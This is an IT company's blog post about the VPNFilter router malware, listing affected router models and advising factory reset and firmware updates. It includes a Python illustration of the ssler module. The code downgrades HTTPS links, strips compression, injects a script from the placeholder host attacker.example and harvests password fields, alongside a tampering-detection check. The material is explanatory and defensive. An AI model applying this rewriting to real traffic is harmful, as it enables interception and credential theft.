952-223-4422
109 Rice Street South Jordan MN 55352

VPNFilter Malware worse than we thought

Recently we published an article giving a detailed explanation of a current threat facing more than 500,000 devices, known as the VPNFilter malware.

This malware became a prominent issue fast and has been tied to an origin in Russia. Initially it was thought that rebooting your home router and modem would address the problem, but as investigations continued it became clear that this was wrong: a reboot clears the later stages of the malware, but the first-stage loader persists across reboots and can pull the rest back down.

VPNFilter Malware

Two weeks ago it was reported that more than 500,000 consumer-grade routers in 54 countries were infected with malware, and that this malware could be put to many nefarious purposes.

Recently, however, researchers from Cisco's Talos security group have gained additional insight into the inner workings of this malware. They report that it runs on a much broader range of models, many from manufacturers previously thought to be unaffected. That makes it a stronger threat than initially perceived.

New Tricks

VPNFilter has been found to perform man-in-the-middle attacks on web traffic passing through an infected router. A module of the malware named ssler injects malicious payloads into that traffic as it transits the router. Not only that, the module can modify the content delivered by websites and tailor its payloads to exploit specific devices attached to the infected router.

The ssler module is also designed to capture sensitive data passed between the devices behind the router and the outside internet. It does this by inspecting web requests for specific signs that passwords or other sensitive data are being transmitted (for example, a login form being submitted), then copying that data and sending it to the attackers' servers.

To bypass the TLS encryption that exists to prevent exactly this kind of attack, the ssler module attempts to downgrade HTTPS connections to plaintext HTTP: https:// links in pages passing through the router are rewritten to http://, so the browser's next request goes out in the clear. It also strips the gzip compression that browsers ask for (by removing the Accept-Encoding header from outbound requests), so that the plaintext traffic is easier to modify in flight.
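To make the mechanics concrete, here is an added example (written for this page; it is not Talos code, not the malware itself, and not something RE2Tech ships) that models the rewrites described above on constructed sample traffic: the request-side removal of Accept-Encoding, the response-side https:// to http:// rewrite and script injection, the harvesting of password fields from a form POST now travelling in plaintext, and a comparison check that flags such rewriting in a page seen behind a suspect router. The hosts bank.example and attacker.example and the injected script URL are placeholders, and the sample messages are made up for the example.

```python
"""Added model of ssler-style HTTP rewriting (illustration only, not Talos
code or the malware): constructed request/response bytes are edited the way
the article describes, and a checker compares a clean fetch with a suspect one."""
from urllib.parse import parse_qsl

# Hypothetical payload host, used only to make the injection visible.
INJECTED_TAG = b'<script src="http://attacker.example/p.js"></script>'


def parse_http(message: bytes):
    """Split a raw HTTP message into (start line, [(name, value)], body)."""
    head, _, body = message.partition(b"\r\n\r\n")
    start, *lines = head.split(b"\r\n")
    headers = []
    for line in lines:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return start, headers, body


def build_http(start: bytes, headers, body: bytes) -> bytes:
    head = b"\r\n".join([start] + [n + b": " + v for n, v in headers])
    return head + b"\r\n\r\n" + body


def header(headers, name: bytes):
    """Case-insensitive header lookup; None when absent."""
    for n, v in headers:
        if n.lower() == name.lower():
            return v
    return None


def without(headers, name: bytes):
    return [(n, v) for n, v in headers if n.lower() != name.lower()]


def rewrite_request(request: bytes) -> bytes:
    """Router-side edit of a LAN client's outbound request: drop
    Accept-Encoding so the server answers in uncompressed text."""
    start, headers, body = parse_http(request)
    return build_http(start, without(headers, b"Accept-Encoding"), body)


def rewrite_response(response: bytes) -> bytes:
    """Router-side edit of the server's reply: https:// links become http://
    so the browser's next request stays in plaintext, and a payload tag is
    injected before </body>. Compressed or non-HTML replies are left alone,
    which is why the request-side rewrite above matters to the attacker."""
    start, headers, body = parse_http(response)
    ctype = header(headers, b"Content-Type") or b""
    if b"text/html" not in ctype or header(headers, b"Content-Encoding"):
        return response
    body = body.replace(b"https://", b"http://")
    body = body.replace(b"</body>", INJECTED_TAG + b"</body>", 1)
    headers = without(headers, b"Content-Length")
    headers.append((b"Content-Length", str(len(body)).encode()))
    return build_http(start, headers, body)


def capture_sensitive(request: bytes) -> dict:
    """Credential harvesting as described: pull password-like fields out of
    a form POST that is now travelling in the clear."""
    start, _, body = parse_http(request)
    if not start.startswith(b"POST "):
        return {}
    fields = dict(parse_qsl(body.decode(errors="replace")))
    return {k: v for k, v in fields.items() if "pass" in k.lower()}


def stripping_indicators(clean: bytes, observed: bytes) -> list:
    """Compare an uncompressed response fetched over a path you trust with
    the same page as seen behind the suspect router; list the signs of
    in-transit rewriting described in the article."""
    _, _, clean_body = parse_http(clean)
    _, _, seen_body = parse_http(observed)
    found = []
    if clean_body.count(b"https://") > seen_body.count(b"https://"):
        found.append("https links rewritten to http")
    if seen_body.count(b"<script") > clean_body.count(b"<script"):
        found.append("script injected into page")
    return found


# Constructed sample traffic; bank.example is a placeholder, not a real site.
SAMPLE_REQUEST = build_http(
    b"GET /login HTTP/1.1",
    [(b"Host", b"bank.example"), (b"Accept-Encoding", b"gzip, deflate")], b"")
SAMPLE_HTML = (
    b"<html><body>"
    b'<a href="https://bank.example/account">Accounts</a>'
    b'<form action="https://bank.example/login" method="post">'
    b'<input name="password"></form></body></html>')
SAMPLE_RESPONSE = build_http(
    b"HTTP/1.1 200 OK",
    [(b"Content-Type", b"text/html; charset=utf-8"),
     (b"Content-Length", str(len(SAMPLE_HTML)).encode())], SAMPLE_HTML)
SAMPLE_LOGIN_POST = build_http(
    b"POST /login HTTP/1.1",
    [(b"Host", b"bank.example"),
     (b"Content-Type", b"application/x-www-form-urlencoded")],
    b"user=alice&password=hunter2")

if __name__ == "__main__":
    tampered = rewrite_response(SAMPLE_RESPONSE)
    print(rewrite_request(SAMPLE_REQUEST).decode(), tampered.decode(), sep="\n")
    print(capture_sensitive(SAMPLE_LOGIN_POST), stripping_indicators(SAMPLE_RESPONSE, tampered))
```

The `stripping_indicators` check is the practical takeaway: fetch the same page once from a connection you trust (a phone on mobile data, for instance) and once from behind the router you are worried about, and compare. Rewritten links and extra script tags are exactly the in-transit edits the article describes, and they do not show up in a browser that is simply looking at a page that "loads fine".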

Loss of traffic control

Cisco describes this newly discovered capability as significantly more dangerous than first expected, because it turns the routers themselves into an attack platform.

The malware could make users see incorrect information. For example, while a user is logged in to online banking checking over their accounts, everything may look normal while, in the background, the account is being siphoned, with no visual indication of the activity. Because the attackers sit on the router, they can manipulate anything going in or out of the device, and siphon off PGP keys and the like along the way.

The newly infected

Cisco's Talos said that VPNFilter also affects a much wider range of devices than previously reported. The earlier list of "at risk" router models had many gaps, and it now turns out that many more models are in danger.

The following is the updated list of models known or believed to be affected by this malware (entries marked "new" were added in the latest report):

Asus Devices:
RT-AC66U (new)
RT-N10 (new)
RT-N10E (new)
RT-N10U (new)
RT-N56U (new)
RT-N66U (new)

D-Link Devices:
DES-1210-08P (new)
DIR-300 (new)
DIR-300A (new)
DSR-250N (new)
DSR-500N (new)
DSR-1000 (new)
DSR-1000N (new)

Huawei Devices:
HG8245 (new)

Linksys Devices:
E1200
E2500
E3000 (new)
E3200 (new)
E4200 (new)
RV082 (new)
WRVS4400N

Mikrotik Devices:
CCR1009 (new)
CCR1016
CCR1036
CCR1072
CRS109 (new)
CRS112 (new)
CRS125 (new)
RB411 (new)
RB450 (new)
RB750 (new)
RB911 (new)
RB921 (new)
RB941 (new)
RB951 (new)
RB952 (new)
RB960 (new)
RB962 (new)
RB1100 (new)
RB1200 (new)
RB2011 (new)
RB3011 (new)
RB Groove (new)
RB Omnitik (new)
STX5 (new)

Netgear Devices:
DG834 (new)
DGN1000 (new)
DGN2200
DGN3500 (new)
FVS318N (new)
MBRN3000 (new)
R6400
R7000
R8000
WNR1000
WNR2000
WNR2200 (new)
WNR4000 (new)
WNDR3700 (new)
WNDR4000 (new)
WNDR4300 (new)
WNDR4300-TN (new)
UTM50 (new)

QNAP Devices:
TS251
TS439 Pro
Other QNAP NAS devices running QTS software

TP-Link Devices:
R600VPN
TL-WR741ND (new)
TL-WR841N (new)

Ubiquiti Devices:
NSM2 (new)
PBE M5 (new)

Upvel Devices:
Unknown Models* (new)

ZTE Devices:
ZXHN H108N (new)


As you can see, the list of affected routers is extensive. Many of these are common in households today, so check carefully whether yours is listed. If it is, a reboot on its own is not enough, because the malware's first stage survives reboots: restore the device to factory defaults, then flash the latest available firmware. Ideally download the firmware image in advance on a clean machine and apply it over the LAN, so the router is patched before it is exposed to the internet again, and change the default admin password afterwards.

The malware exploits known flaws in these routers, and those flaws have already been patched by the manufacturers. To keep your device from being infected, keep its firmware up to date and avoid exposing admin interfaces or other services to the internet. Call your local I.T. service provider for help in any of these areas.

Keep up to date on your technology and its vulnerabilities and solutions with RE2Tech. We make I.T. easy!

Have you taken precautions? Is your sensitive information at risk?

Give us a call or send us an email for all your I.T. needs! We at Re2tech make I.T. happen!

Phone: 952-223-4422

[email protected]
